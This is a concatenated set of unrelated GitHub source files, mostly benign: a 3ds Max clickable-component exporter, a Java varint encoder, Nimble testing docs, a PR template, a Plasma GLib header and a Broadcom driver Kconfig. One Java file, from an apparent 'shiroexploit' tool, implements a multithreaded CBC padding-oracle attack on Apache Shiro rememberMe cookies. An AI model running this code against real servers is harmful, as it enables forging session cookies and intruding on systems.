#include "pnSceneObject/plSimulationInterface.h"
#include "pnKeyedObject/hsKeyedObject.h"
#include "plPhysical/plCollisionDetector.h" // MM
#include "plModifier/plLogicModifier.h"
#include "pnModifier/plConditionalObject.h"
#include "plPhysical/plPickingDetector.h"
#include "pfConditional/plActivatorConditionalObject.h"
#include "pfConditional/plFacingConditionalObject.h"
#include "pfConditional/plObjectInBoxConditionalObject.h"
#include "pnMessage/plObjRefMsg.h"
#include "pnMessage/plNotifyMsg.h"
#include "pnMessage/plCursorChangeMsg.h"
#include "MaxConvert/plConvert.h"
#include "MaxMain/plPhysicalProps.h"
#include "plPhysical/plSimDefs.h"
#include "MaxMain/plPhysicalProps.h"
// Empty function - presumably referenced from elsewhere so the linker keeps
// this translation unit (TODO confirm against the component registry).
void DummyCodeIncludeFuncClickable() {}

// Registers the Clickable component with Max under the detector category.
CLASS_DESC(plClickableComponent, gClickableDesc, "Clickable", "Clickable", COMP_TYPE_DETECTOR, CLICKABLE_CID)
enum
{
kClickableDirectional,
kClickableDegrees,
kClickableUseProxy,
kClickableProxy,
kClickableUseRegion,
kClickableProxyRegion,
kClickableToggle_DEAD,
kClickableOneShot,
kClickableBoundsType,
kClickableEnabled,
kClickablePhysical,
kClickableIgnoreProxyRegion,
kClickableFriction,
};
// Max ParamBlock definition for the Clickable component: parameter types,
// defaults, ranges and the dialog controls they bind to. Indices must match
// the enum above.
ParamBlockDesc2 gClickableBlock
(
    plComponent::kBlkComp, _T("clickable"), 0, &gClickableDesc, P_AUTO_CONSTRUCT + P_AUTO_UI, plComponent::kRefComp,

    IDD_COMP_DETECTOR_CLICKABLE, IDS_COMP_DETECTOR_CLICKABLE, 0, 0, NULL,

    kClickableDirectional, _T("directional"), TYPE_BOOL, 0, 0,
        p_ui, TYPE_SINGLECHEKBOX, IDC_COMP_CLICK_OMNI,
        end,

    kClickableDegrees, _T("degrees"), TYPE_INT, P_ANIMATABLE, 0,
        p_range, 1, 180,
        p_default, 180,
        p_ui, TYPE_SPINNER, EDITTYPE_POS_INT,
        IDC_COMP_CLICK_DEG, IDC_COMP_CLICK_DEGSPIN, SPIN_AUTOSCALE,
        end,

    kClickableUseProxy, _T("useProxy"), TYPE_BOOL, 0, 0,
        p_ui, TYPE_SINGLECHEKBOX, IDC_COMP_CLICK_USEPROXY,
        p_enable_ctrls, 1, kClickableProxy,
        end,

    kClickableProxy, _T("proxyPrimitave"), TYPE_INODE, 0, 0,
        p_ui, TYPE_PICKNODEBUTTON, IDC_COMP_CLICK_PROXY,
        // p_sclassID, GEOMOBJECT_CLASS_ID,
        p_prompt, IDS_COMP_PHYS_CHOSEN_BASE,
        end,

    kClickableProxyRegion, _T("proxyRegion"), TYPE_INODE, 0, 0,
        p_ui, TYPE_PICKNODEBUTTON, IDC_COMP_CLICK_PROXYREGION,
        // p_sclassID, GEOMOBJECT_CLASS_ID,
        p_prompt, IDS_COMP_PHYS_CHOSEN_BASE,
        end,

    kClickableOneShot, _T("oneshot"), TYPE_BOOL, 0, 0,
        p_ui, TYPE_SINGLECHEKBOX, IDC_ONESHOT,
        end,

    kClickableBoundsType, _T("BoundingConditions"), TYPE_INT, 0, 0,
        p_ui, TYPE_RADIO, 4, IDC_RADIO_BSPHERE, IDC_RADIO_BBOX, IDC_RADIO_BHULL, IDC_RADIO_PICKSTATE,
        p_vals, plSimDefs::kSphereBounds, plSimDefs::kBoxBounds, plSimDefs::kHullBounds, plSimDefs::kProxyBounds,
        p_default, plSimDefs::kHullBounds,
        end,

    kClickableEnabled, _T("enabled"), TYPE_BOOL, 0, 0,
        p_ui, TYPE_SINGLECHEKBOX, IDC_ENABLED,
        p_default, TRUE,
        end,

    kClickablePhysical, _T("physical"), TYPE_BOOL, 0, 0,
        p_ui, TYPE_SINGLECHEKBOX, IDC_COLLIDABLE_CHECK,
        p_default, TRUE,
        end,

    kClickableIgnoreProxyRegion, _T("ignoreProxyRegion"), TYPE_BOOL, 0, 0,
        p_ui, TYPE_SINGLECHEKBOX, IDC_IGNORE_REGION_CHECK,
        p_default, FALSE,
        end,

    kClickableFriction, _T("friction"), TYPE_FLOAT, 0, 0,
        p_range, 0.0f, FLT_MAX,
        p_default, 0.0f,
        p_ui, TYPE_SPINNER, EDITTYPE_POS_FLOAT,
        IDC_COMP_CLICKABLE_FRIC_EDIT1, IDC_COMP_CLICKABLE_FRIC_SPIN1, SPIN_AUTOSCALE,
        end,

    end
);
plClickableComponent::plClickableComponent()
{
    // hook up the class descriptor and build the auto param blocks
    fClassDesc = &gClickableDesc;
    fClassDesc->MakeAutoParamBlocks(this);
}
// Reports the clickable proxy (when one is in use) and the proxy detector
// region as non-drawable, since both are physics-only helper nodes.
void plClickableComponent::CollectNonDrawables(INodeTab& nonDrawables)
{
    if (fCompPB->GetInt(kClickableUseProxy))
    {
        INode* proxyNode = fCompPB->GetINode(kClickableProxy);
        if (proxyNode != nil)
            nonDrawables.Append(1, &proxyNode);
    }

    INode* regionNode = fCompPB->GetINode(kClickableProxyRegion);
    if (regionNode != nil)
        nonDrawables.Append(1, &regionNode);
}
// Setup pass: configures physical/LOS properties on the clickable node (or
// its proxy) and on the optional proximity detector region.
bool plClickableComponent::SetupProperties(plMaxNode* node, plErrorMsg* pErrMsg)
{
    plActivatorBaseComponent::SetupProperties(node, pErrMsg);

    bool physical = (fCompPB->GetInt(kClickablePhysical) != 0);

    //
    // Phys Props for the Clickable itself.
    //
    plMaxNode *clickNode = node;
    if (fCompPB->GetInt(kClickableUseProxy))
    {
        clickNode = (plMaxNode*)fCompPB->GetINode(kClickableProxy);
        if (clickNode)
            clickNode->SetDrawable(false);
        else
            clickNode = node;   // no proxy picked: fall back to our own node
    }

    if (clickNode)
    {
        plPhysicalProps *physProps = clickNode->GetPhysicalProps();
        // clickables must be hittable by the cursor's line-of-sight probe
        physProps->SetLOSUIItem(true, clickNode, pErrMsg);
        if (physical)
        {
            physProps->SetGroup(plSimDefs::kGroupStatic, clickNode, pErrMsg);

            // only if movable will it have mass (then it will keep track of movements in PhysX)
            if ( clickNode->IsMovable() || clickNode->IsTMAnimatedRecur() )
                physProps->SetMass(1.0, clickNode, pErrMsg);

            physProps->SetFriction(fCompPB->GetFloat(kClickableFriction),clickNode,pErrMsg);
        }
        else
        {
            // non-collidable: participates in LOS tests only
            physProps->SetGroup(plSimDefs::kGroupLOSOnly, clickNode, pErrMsg);
            if(clickNode->IsMovable() || clickNode->IsTMAnimatedRecur())
            {
                physProps->SetMass(1.0, clickNode, pErrMsg);
            }
        }
        physProps->SetBoundsType(fCompPB->GetInt(kClickableBoundsType), clickNode, pErrMsg);
    }

    //
    // Phys Properties for the auto-generated Detector Region...
    //
    plMaxNode* detectNode = (plMaxNode*)fCompPB->GetINode(kClickableProxyRegion);
    if (detectNode)
    {
        plPhysicalProps *physPropsDetector = detectNode->GetPhysicalProps();
        // physPropsDetector->SetAllowLOS(true, detectNode, pErrMsg);
        physPropsDetector->SetProxyNode(detectNode, node, pErrMsg);
        physPropsDetector->SetBoundsType(plSimDefs::kHullBounds, detectNode, pErrMsg);

        // only if movable will it have mass (then it will keep track of movements in PhysX)
        if ( detectNode->IsMovable() || detectNode->IsTMAnimatedRecur() )
            physPropsDetector->SetMass(1.0, detectNode, pErrMsg);

        // the region only needs to report the avatar entering/leaving it
        physPropsDetector->SetGroup(plSimDefs::kGroupDetector, detectNode, pErrMsg );
        physPropsDetector->SetReportGroup(1<<plSimDefs::kGroupAvatar, detectNode, pErrMsg );
    }

    return true;
}
// Pre-convert pass: creates the plLogicModifier for the clickable node (or
// its proxy), attaches it to the scene object and stashes its key so the
// Convert() pass can find the same modifier.
bool plClickableComponent::PreConvert(plMaxNode *node, plErrorMsg *pErrMsg)
{
    plMaxNode *clickNode = node;
    if (fCompPB->GetInt(kClickableUseProxy))
    {
        clickNode = (plMaxNode*)fCompPB->GetINode(kClickableProxy);
        if (clickNode)
            clickNode->SetDrawable(false);
        else
            clickNode = node;   // no proxy picked: fall back to our own node
    }
    clickNode->SetForceLocal(true);

    plLocation loc = clickNode->GetLocation();
    plSceneObject *obj = clickNode->GetSceneObject();

    // Create and register the VolumeGadget's logic component
    plLogicModifier *logic = new plLogicModifier;
    plKey logicKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), logic, clickNode->GetLocation());
    hsgResMgr::ResMgr()->AddViaNotify(logicKey, new plObjRefMsg(obj->GetKey(), plRefMsg::kOnCreate, -1, plObjRefMsg::kModifier), plRefFlags::kActiveRef);

    // remembered per-node so Convert() picks up the same modifier
    fLogicModKeys[clickNode] = logicKey;

    return true;
}
// Convert pass: wires the picking detector, the conditional objects
// (activator, optional proximity region, facing) and the logic modifier
// created in PreConvert(), then registers the notification receivers.
bool plClickableComponent::Convert(plMaxNode *node, plErrorMsg *pErrMsg)
{
    bool ignoreProxyRegion = (fCompPB->GetInt(kClickableIgnoreProxyRegion) != 0);

    //
    // Error checking
    //
    plMaxNode* clickProxyNode = node;
    if (fCompPB->GetInt(kClickableUseProxy))
    {
        clickProxyNode = (plMaxNode*)fCompPB->GetINode(kClickableProxy);
        if (!clickProxyNode || !clickProxyNode->CanConvert())
        {
            // recoverable: warn and fall back to the component's own node
            pErrMsg->Set(true,
                        "Clickable Error",
                        "The Clickable '%s' on node '%s' is set to use a proxy but doesn't have one, or it didn't convert.\n"
                        "The node the Clickable is attached to will be used instead.",
                        GetINode()->GetName(), node->GetName()).Show();
            pErrMsg->Set(false);
            clickProxyNode = node;
        }
    }

    plMaxNode* detectNode = (plMaxNode*)fCompPB->GetINode(kClickableProxyRegion);
    if ((!detectNode || !detectNode->CanConvert()) && (!ignoreProxyRegion))
    {
        // fatal: a region is required unless explicitly ignored
        pErrMsg->Set(true,
                    "Clickable Error",
                    "The Clickable '%s' on node '%s' has a required region that is missing, or didn't convert.\n"
                    "The export will be aborted.",
                    GetINode()->GetName(), node->GetName()).Show();
        return false;
    }

    plLocation loc = clickProxyNode->GetLocation();
    plSceneObject *obj = clickProxyNode->GetSceneObject();

    // logic modifier was created for this node during PreConvert()
    plKey logicKey = fLogicModKeys[clickProxyNode];
    plLogicModifier *logic = plLogicModifier::ConvertNoRef(logicKey->GetObjectPtr());
    logic->fMyCursor = plCursorChangeMsg::kCursorPoised;

    if (fCompPB->GetInt(kClickableOneShot))
        logic->SetFlag(plLogicModBase::kOneShot);

    // everyone who should hear the notify when the clickable fires
    hsTArray<plKey> receivers;
    IGetReceivers(node, receivers);
    for (int i = 0; i < receivers.Count(); i++)
        logic->AddNotifyReceiver(receivers[i]);

    // Create the detector
    plDetectorModifier *detector = nil;
    detector = new plPickingDetector;

    // Register the detector
    plKey detectorKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), detector, loc);
    hsgResMgr::ResMgr()->AddViaNotify(detectorKey, new plObjRefMsg(obj->GetKey(), plRefMsg::kOnCreate, -1, plObjRefMsg::kModifier), plRefFlags::kActiveRef);

    // create and register the CONDITIONS for the DETECTOR's Logic Modifier
    plActivatorConditionalObject* activatorCond = new plActivatorConditionalObject;
    plKey activatorKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), activatorCond, loc);

    //
    // Create required region
    //
    // need a player in box condition here...
    // first a detector-any for the box
    if (!ignoreProxyRegion)
    {
        plObjectInVolumeDetector* pCDet = new plObjectInVolumeDetector(plCollisionDetector::kTypeAny);

        plKey pCDetKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), pCDet, loc);
        hsgResMgr::ResMgr()->AddViaNotify(pCDetKey, new plObjRefMsg(detectNode->GetSceneObject()->GetKey(), plRefMsg::kOnCreate, -1, plObjRefMsg::kModifier), plRefFlags::kActiveRef);
        pCDet->AddLogicObj(logicKey);

        // then an object-in-box condition for the logic mod
        plObjectInBoxConditionalObject* boxCond = new plObjectInBoxConditionalObject;
        plKey boxCondKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), boxCond, loc);
        logic->AddCondition(boxCond);
    }

    //
    // How do we feel about player facing
    //
    plFacingConditionalObject* facingCond = new plFacingConditionalObject;
    facingCond->SetDirectional(fCompPB->GetInt(kClickableDirectional));
    int deg = fCompPB->GetInt(kClickableDegrees);
    if (deg > 180)
        deg = 180;
    // the tolerance is stored as the cosine of the configured angle
    float rad = hsDegreesToRadians(deg);
    facingCond->SetTolerance(cos(rad));
    plKey facingKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), facingCond, loc);

    detector->AddLogicObj(logicKey);     // send messages to this logic component
    activatorCond->SetActivatorKey(detectorKey); // Tells the activator condition to look for stimulus from the detector
    logic->AddCondition(activatorCond); // add this activator condition
    logic->AddCondition(facingCond);
    logic->SetDisabled(!fCompPB->GetInt(kClickableEnabled));

    // If this is for the SceneViewer, set the local only flag since the read function will never be called
    if (plConvert::Instance().IsForSceneViewer())
        logic->SetLocalOnly(true);

    return true;
}
//
// special physical you can walk through and click with mouse
//
// NOTE(review): registered below with OBSOLETE_CLASS_DESC - apparently kept
// only so old scenes referencing it still load; all conversion steps are
// no-ops.
class plNoBlkClickableComponent : public plComponent
{
public:
    plNoBlkClickableComponent();
    void DeleteThis() { delete this; }

    bool SetupProperties(plMaxNode *node, plErrorMsg *pErrMsg);
    bool Convert(plMaxNode *node, plErrorMsg *pErrMsg) { return true; }
    bool PreConvert(plMaxNode *node, plErrorMsg *pErrMsg) { return true; }

    // all target nodes are reported as non-drawable
    virtual void CollectNonDrawables(INodeTab& nonDrawables) { AddTargetsToList(nonDrawables); }
};
// Registration for the obsolete component and its empty parameter block.
OBSOLETE_CLASS_DESC(plNoBlkClickableComponent, gNoBlkClickableDesc, "(ex)Non Physical Clickable Proxy", "(ex)Non Physical Clickable Proxy", COMP_TYPE_PHYSICAL, Class_ID(0x66325afc, 0x253a3760))

ParamBlockDesc2 gNoBlkClickableBlock
(
    plComponent::kBlkComp, _T("NonPhysicalClickableProxy"), 0, &gNoBlkClickableDesc, P_AUTO_CONSTRUCT, plComponent::kRefComp,
    end
);
plNoBlkClickableComponent::plNoBlkClickableComponent()
{
    // hook up the (obsolete) class descriptor and auto param blocks
    fClassDesc = &gNoBlkClickableDesc;
    fClassDesc->MakeAutoParamBlocks(this);
}
// Obsolete component: nothing to set up; succeed so export continues.
bool plNoBlkClickableComponent::SetupProperties(plMaxNode *pNode, plErrorMsg *pErrMsg)
{
    return true;
}
| {
"pile_set_name": "Github"
} |
package com.shiroexploit.core;
import com.shiroexploit.util.HttpRequest;
import com.shiroexploit.util.HttpRequestInfo;
import com.shiroexploit.util.Tools;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.atomic.AtomicInteger;
/**
 * One round of the CBC padding-oracle attack against Shiro's rememberMe
 * cookie: recovers a single byte of the intermediary value for the given
 * ciphertext block by probing all 256 candidate IV bytes against the
 * target's padding oracle.
 */
public class RoundTask {
    // number of worker threads probing candidates
    private final int threads;
    // hex-encoded ciphertext block under attack
    private final String cipherText;
    // 1-based byte position (from the end of the block) recovered this round
    private final int position;
    // original rememberMe cookie content used when building payloads
    private final String rememberMe;
    // recovered intermediary bytes so far (hex); this round prepends one byte
    private final StringBuffer intermediary;
    // IV suffix: known intermediary XOR'd with the desired padding bytes
    private final String suffix;
    private final HttpRequestInfo httpRequestInfo;

    public RoundTask(HttpRequestInfo httpRequestInfo, int position, String cipherText, StringBuffer intermediary) {
        this.threads = 1;
        this.httpRequestInfo = httpRequestInfo;
        this.cipherText = cipherText;
        this.position = position;
        this.rememberMe = httpRequestInfo.getRememberMeCookie();
        this.intermediary = intermediary;
        this.suffix = Tools.xor(intermediary.toString(), Tools.generateSuffix(position));
    }

    // next candidate byte value (0..255); shared by all workers
    private final AtomicInteger nextCandidate = new AtomicInteger(0);

    /**
     * Probes all 256 candidate bytes and blocks until one is confirmed by
     * the oracle (or all have been tried). On success the recovered
     * intermediary byte is prepended to {@code intermediary}.
     */
    public void start() {
        final CountDownLatch latch = new CountDownLatch(256);
        final ExecutorService executor = Executors.newFixedThreadPool(this.threads);
        for (int a = 0; a < 256; a++) {
            if (executor.isShutdown()) {
                break;
            }
            try {
                executor.execute(new Runnable() {
                    @Override
                    public void run() {
                        int j = nextCandidate.getAndIncrement();
                        // two-digit lowercase hex for the candidate byte
                        String hex = Integer.toHexString(j);
                        if (hex.length() == 1) {
                            hex = "0" + hex;
                        }
                        String ivString = "00000000000000000000000000000000".substring(2 * position) + hex + suffix;
                        String paddingOraclePayload = Tools.generatePayload(rememberMe, ivString, cipherText);
                        if (HttpRequest.isValid(httpRequestInfo, paddingOraclePayload)) {
                            // At position 1 there is a small chance the oracle accepted an
                            // 0x02 0x02 (or similar) padding instead of 0x01, so re-check
                            // with the second-to-last IV byte changed before trusting it.
                            if (position == 1) {
                                ivString = ivString.substring(0, 28) + "01" + ivString.substring(30);
                                paddingOraclePayload = Tools.generatePayload(rememberMe, ivString, cipherText);
                                if (HttpRequest.isValid(httpRequestInfo, paddingOraclePayload)) {
                                    synchronized (RoundTask.class) {
                                        intermediary.insert(0, Tools.xor(Integer.toHexString(position), ivString));
                                        executor.shutdownNow();
                                        // release every waiter: the byte is found
                                        while (latch.getCount() > 0) {
                                            latch.countDown();
                                        }
                                    }
                                }
                            } else {
                                synchronized (RoundTask.class) {
                                    intermediary.insert(0, Tools.xor(Integer.toHexString(position), ivString.substring(32 - 2 * position, 32 - 2 * position + 2)));
                                    executor.shutdownNow();
                                    // release every waiter: the byte is found
                                    while (latch.getCount() > 0) {
                                        latch.countDown();
                                    }
                                }
                            }
                        }
                        latch.countDown();
                    }
                });
            } catch (java.util.concurrent.RejectedExecutionException ignored) {
                // a worker found the byte and called shutdownNow() between our
                // isShutdown() check and execute(); nothing more to submit
                break;
            }
        }
        try {
            latch.await();
        } catch (InterruptedException e) {
            // preserve the interrupt status for the caller
            Thread.currentThread().interrupt();
        } finally {
            // fix: the executor was never shut down when no candidate matched,
            // leaking its worker thread on every round
            executor.shutdown();
        }
    }
}
| {
"pile_set_name": "Github"
} |
/**
* DataOutputStream extended by varlength diff coding
*
* @author ab
*/
package btools.util;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.OutputStream;
/**
 * DataOutputStream extended with variable-length difference coding: values
 * are written as deltas against the previous value of the same slot, using a
 * zig-zag mapping plus a little-endian base-128 varint encoding.
 */
public final class DiffCoderDataOutputStream extends DataOutputStream
{
  // last value written per diff slot; used to compute deltas in writeDiffed
  private long[] lastValues = new long[10];

  public DiffCoderDataOutputStream( OutputStream os )
  {
    super( os );
  }

  /**
   * Writes the difference between {@code v} and the previous value written
   * for slot {@code idx} as a signed variable-length integer, then records
   * {@code v} as the slot's new baseline.
   */
  public void writeDiffed( long v, int idx ) throws IOException
  {
    long d = v - lastValues[idx];
    lastValues[idx] = v;
    writeSigned( d );
  }

  /**
   * Zig-zag maps the signed value into an unsigned one (sign stored in the
   * lowest bit) and writes it as a varint.
   */
  public void writeSigned( long v ) throws IOException
  {
    writeUnsigned( v < 0 ? ( (-v) << 1 ) | 1 : v << 1 );
  }

  /**
   * Writes {@code v} as a little-endian base-128 varint: 7 payload bits per
   * byte, the high bit set on every byte except the last.
   */
  public void writeUnsigned( long v ) throws IOException
  {
    do
    {
      long i7 = v & 0x7f;
      // fix: use the unsigned shift - the signed ">>= 7" sign-extends a
      // negative argument and never reaches 0, looping forever; for the
      // intended non-negative inputs both shifts are identical
      v >>>= 7;
      if ( v != 0 ) i7 |= 0x80;
      writeByte( (byte)( i7 & 0xff ) );
    }
    while( v != 0 );
  }
}
| {
"pile_set_name": "Github"
} |
# Clearer Tests Using Nimble Assertions
When code doesn't work the way it's supposed to, unit tests should make it
**clear** exactly what's wrong.
Take the following function which, given a bunch of monkeys, returns only
the silly monkeys in the bunch:
```swift
public func silliest(monkeys: [Monkey]) -> [Monkey] {
return monkeys.filter { $0.silliness == .VerySilly }
}
```
Now let's say we have a unit test for this function:
```swift
func testSilliest_whenMonkeysContainSillyMonkeys_theyreIncludedInTheResult() {
let kiki = Monkey(name: "Kiki", silliness: .ExtremelySilly)
let carl = Monkey(name: "Carl", silliness: .NotSilly)
let jane = Monkey(name: "Jane", silliness: .VerySilly)
let sillyMonkeys = silliest([kiki, carl, jane])
XCTAssertTrue(contains(sillyMonkeys, kiki))
}
```
The test fails with the following failure message:
```
XCTAssertTrue failed
```

The failure message leaves a lot to be desired. It leaves us wondering,
"OK, so something that should have been true was false--but what?"
That confusion slows us down, since we now have to spend time deciphering test code.
## Better Failure Messages, Part 1: Manually Providing `XCTAssert` Failure Messages
`XCTAssert` assertions allow us to specify a failure message of our own, which certainly helps:
```diff
func testSilliest_whenMonkeysContainSillyMonkeys_theyreIncludedInTheResult() {
let kiki = Monkey(name: "Kiki", silliness: .ExtremelySilly)
let carl = Monkey(name: "Carl", silliness: .NotSilly)
let jane = Monkey(name: "Jane", silliness: .VerySilly)
let sillyMonkeys = silliest([kiki, carl, jane])
- XCTAssertTrue(contains(sillyMonkeys, kiki))
+ XCTAssertTrue(contains(sillyMonkeys, kiki), "Expected sillyMonkeys to contain 'Kiki'")
}
```
But we have to write our own failure message.
## Better Failure Messages, Part 2: Nimble Failure Messages
Nimble makes your test assertions, and their failure messages, easier to read:
```diff
func testSilliest_whenMonkeysContainSillyMonkeys_theyreIncludedInTheResult() {
let kiki = Monkey(name: "Kiki", silliness: .ExtremelySilly)
let carl = Monkey(name: "Carl", silliness: .NotSilly)
let jane = Monkey(name: "Jane", silliness: .VerySilly)
let sillyMonkeys = silliest([kiki, carl, jane])
- XCTAssertTrue(contains(sillyMonkeys, kiki), "Expected sillyMonkeys to contain 'Kiki'")
+ expect(sillyMonkeys).to(contain(kiki))
}
```
We don't have to write our own failure message--the one provided by Nimble
is already very readable:
```
expected to contain <Monkey(name: Kiki, sillines: ExtremelySilly)>,
got <[Monkey(name: Jane, silliness: VerySilly)]>
```

The failure message makes it clear what's wrong: we were expecting `kiki` to be included
in the result of `silliest()`, but the result only contains `jane`. Now that we know
exactly what's wrong, it's easy to fix the issue:
```diff
public func silliest(monkeys: [Monkey]) -> [Monkey] {
- return monkeys.filter { $0.silliness == .VerySilly }
+ return monkeys.filter { $0.silliness == .VerySilly || $0.silliness == .ExtremelySilly }
}
```
Nimble provides many different kind of assertions, each with great failure
messages. And unlike `XCTAssert`, you don't have to type your own failure message
every time.
For the full list of Nimble assertions, check out the [Nimble README](https://github.com/Quick/Nimble).
Below is just a sample, to whet your appetite:
```swift
expect(1 + 1).to(equal(2))
expect(1.2).to(beCloseTo(1.1, within: 0.1))
expect(3) > 2
expect("seahorse").to(contain("sea"))
expect(["Atlantic", "Pacific"]).toNot(contain("Mississippi"))
expect(ocean.isClean).toEventually(beTruthy())
```
| {
"pile_set_name": "Github"
} |
## Proposed changes
Please describe your changes in full here, including steps needed to build/test it. The more useful detail you give, the easier it is for the core team to review and approve :smile:
If this is a particularly large change, give as much detail as you can about the reasoning behind your solution, and any alternatives you considered.
**Please also include a link to the issue that this addresses (we usually won't accept pull requests without an associated issue).**
## Checklist
Below is a checklist of the key things that the core team will be looking for when reviewing your PR. Please check off as many of these as you can prior to submitting the PR, but don't worry if you can't do all of them, the core team are here to help!
- [ ] I have read the [CONTRIBUTING](https://github.com/adaptlearning/adapt_authoring/blob/master/.github/CONTRIBUTING.md) doc
- [ ] I have checked that the code compiles correctly
- [ ] I have checked that unit test suite passes locally with my changes
- [ ] I have added new tests that cover my changes (where appropriate)
- [ ] I have added documentation (where appropriate)
- [ ] Any dependent changes have already been merged
## Next steps
The core team will be automatically notified of your changes, but also feel free to bring it to our attention via the [gitter.im channel](https://gitter.im/adaptlearning/adapt_authoring).
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
#pragma once
#include <plasma/client.h>
#include <plasma-glib/client.h>
/* Wraps an existing C++ plasma::PlasmaClient in a new GLib GPlasmaClient
 * object. NOTE(review): declaration only — ownership/lifetime of the raw
 * pointer is presumably transferred to the wrapper; confirm against the
 * implementation. */
GPlasmaClient *
gplasma_client_new_raw(plasma::PlasmaClient *plasma_client);
/* Returns the underlying C++ plasma::PlasmaClient held by a GPlasmaClient.
 * NOTE(review): declaration only — the wrapper presumably retains ownership
 * of the returned pointer; confirm against the implementation. */
plasma::PlasmaClient *
gplasma_client_get_raw(GPlasmaClient *client);
| {
"pile_set_name": "Github"
} |
config B43LEGACY
tristate "Broadcom 43xx-legacy wireless support (mac80211 stack)"
depends on SSB_POSSIBLE && MAC80211 && HAS_DMA
select SSB
select FW_LOADER
---help---
b43legacy is a driver for 802.11b devices from Broadcom (BCM4301 and
BCM4303) and early model 802.11g chips (BCM4306 Ver. 2) used in the
Linksys WPC54G V1 PCMCIA devices.
Newer 802.11g and 802.11a devices need b43.
It is safe to include both b43 and b43legacy as the underlying glue
layer will automatically load the correct version for your device.
This driver uses V3 firmware, which must be installed separately using
b43-fwcutter.
This driver can be built as a module (recommended) that will be
called "b43legacy". If unsure, say M.
# Auto-select SSB PCI-HOST support, if possible
config B43LEGACY_PCI_AUTOSELECT
bool
depends on B43LEGACY && SSB_PCIHOST_POSSIBLE
select SSB_PCIHOST
select SSB_B43_PCI_BRIDGE
default y
# Auto-select SSB PCICORE driver, if possible
config B43LEGACY_PCICORE_AUTOSELECT
bool
depends on B43LEGACY && SSB_DRIVER_PCICORE_POSSIBLE
select SSB_DRIVER_PCICORE
default y
# LED support
# This config option automatically enables b43legacy LEDS support,
# if it's possible.
config B43LEGACY_LEDS
bool
depends on B43LEGACY && MAC80211_LEDS && (LEDS_CLASS = y || LEDS_CLASS = B43LEGACY)
default y
# This config option automatically enables b43 HW-RNG support,
# if the HW-RNG core is enabled.
config B43LEGACY_HWRNG
bool
depends on B43LEGACY && (HW_RANDOM = y || HW_RANDOM = B43LEGACY)
default y
config B43LEGACY_DEBUG
bool "Broadcom 43xx-legacy debugging"
depends on B43LEGACY
default y
---help---
Say Y, because this information will help you get the driver running.
This option generates a minimum of log output.
config B43LEGACY_DMA
bool
depends on B43LEGACY
config B43LEGACY_PIO
bool
depends on B43LEGACY
choice
prompt "Broadcom 43xx-legacy data transfer mode"
depends on B43LEGACY
default B43LEGACY_DMA_AND_PIO_MODE
config B43LEGACY_DMA_AND_PIO_MODE
bool "DMA + PIO"
select B43LEGACY_DMA
select B43LEGACY_PIO
---help---
Include both, Direct Memory Access (DMA) and Programmed I/O (PIO)
data transfer modes. The mode actually used is selectable through
the module parameter "pio". With pio=0 as a module parameter, the
default DMA is used, otherwise PIO is used.
If unsure, choose this option.
config B43LEGACY_DMA_MODE
bool "DMA (Direct Memory Access) only"
select B43LEGACY_DMA
---help---
Only include Direct Memory Access (DMA).
This reduces the size of the driver module, by omitting the PIO code.
config B43LEGACY_PIO_MODE
bool "PIO (Programmed I/O) only"
select B43LEGACY_PIO
---help---
Only include Programmed I/O (PIO).
This reduces the size of the driver module, by omitting the DMA code.
Please note that PIO transfers are slow (compared to DMA).
Also note that not all devices of the b43legacy series support PIO.
You should use PIO only if DMA does not work for you.
endchoice
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.